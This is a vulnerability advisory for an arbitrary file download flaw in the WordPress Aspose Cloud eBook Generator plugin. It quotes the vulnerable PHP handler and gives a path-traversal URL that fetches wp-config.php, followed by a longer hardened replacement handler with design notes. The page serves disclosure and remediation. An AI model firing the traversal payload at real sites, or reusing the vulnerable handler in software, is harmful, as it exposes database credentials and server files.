WordPress Aspose Cloud eBook Generator File Download Vulnerability



EKU-ID: 4703 CVE: OSVDB-ID:
Author: ACC3SS Published: 2015-03-30 Verified: Verified


|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|-------------------------------------------------------------------------|
| [+] Exploit Title: WordPress Aspose-Cloud-eBook-Generator Plugin Arbitrary File Download Vulnerability
| [+] Exploit Author: Ashiyane Digital Security Team
| [+] Vendor Homepage: https://wordpress.org/plugins/aspose-cloud-ebook-generator/
| [+] Download Link: https://downloads.wordpress.org/plugin/aspose-cloud-ebook-generator.zip
| [+] Tested on: Windows, Linux
| [+] Discovered By: ACC3SS
|-------------------------------------------------------------------------|
| [+] Exploit:
| [+] Vulnerable file: http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php
| [+] Vulnerable Code:
  
<?php
// The path comes straight from the query string: no authentication check,
// no restriction to the plugin's export directory, no traversal filtering.
$file = $_GET['file'];

// Only the last path segment is used for the download name; the full,
// attacker-controlled path is still what gets read from disk below.
$file_arr = explode('/',$file);
$file_name = $file_arr[count($file_arr) - 1];

header ("Content-type: octet/stream");
header ("Content-disposition: attachment; filename=".$file_name.";");
header("Content-Length: ".filesize($file));

// Any file the web server user can read is returned to the client.
readfile($file);
exit;
?>
  
| [+] http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=[File Address]
| [+]
| [+] Examples:
| http://localhost/wordpress/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php
|-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
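The root cause in the handler above is that `readfile()` is called on whatever path the `file` parameter carries. The following hardened download handler is an added example written for this page; it is not the plugin's own code or the vendor's patch. It confines downloads to one export directory, accepts only a bare file name with an expected extension, and uses `realpath()` so that both `../` sequences and symlinks pointing outside the directory are refused. The export directory path, the allowed extensions and the constant name are assumptions made for the example, since the page does not state where the plugin writes its generated eBooks.

```php
<?php
// Added example, not the plugin's code. Demonstrates the fix for the
// arbitrary file download in aspose_posts_exporter_download.php:
// the caller may only name a file, never a path, and the file must
// resolve inside a fixed export directory.

// Assumption: the plugin stores generated eBooks here (placeholder path).
define('ASPOSE_EXPORT_DIR', '/var/www/wordpress/wp-content/uploads/aspose-exports');

/**
 * Resolve a user-supplied file name to a canonical path inside $base_dir.
 * Returns the path on success, or null if the request must be refused.
 */
function resolve_export_path(string $requested, string $base_dir): ?string
{
    // Keep only the file name; directory components are not honoured at all.
    $name = basename($requested);
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }

    // Allow-list: a conservative character set and the export formats we
    // expect (assumed list). Anything else, including wp-config.php, is rejected.
    if (!preg_match('/^[A-Za-z0-9._-]+\.(pdf|epub|docx|html)$/', $name)) {
        return null;
    }

    $base = realpath($base_dir);
    if ($base === false) {
        return null; // export directory missing or unreadable
    }

    // realpath() canonicalises the final path and follows symlinks, so a
    // link inside the export directory that points elsewhere is also caught.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || !is_file($path)) {
        return null;
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside the export directory
    }
    return $path;
}

$requested = $_GET['file'] ?? '';
$path = resolve_export_path($requested, ASPOSE_EXPORT_DIR);
if ($path === null) {
    http_response_code(400);
    exit('Invalid file request.');
}

header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('Content-Length: ' . filesize($path));
readfile($path);
exit;
```

Two design points worth noting: the check is done on the canonical path returned by `realpath()`, not on the raw string, so encoded or doubled traversal sequences never reach the comparison; and the prefix test includes the trailing directory separator, which stops a sibling directory such as `aspose-exports-old` from passing as "inside" the export directory. In a real WordPress plugin the handler would additionally verify that the requester is logged in and entitled to the export (for example with a nonce or capability check), which the original code also omits.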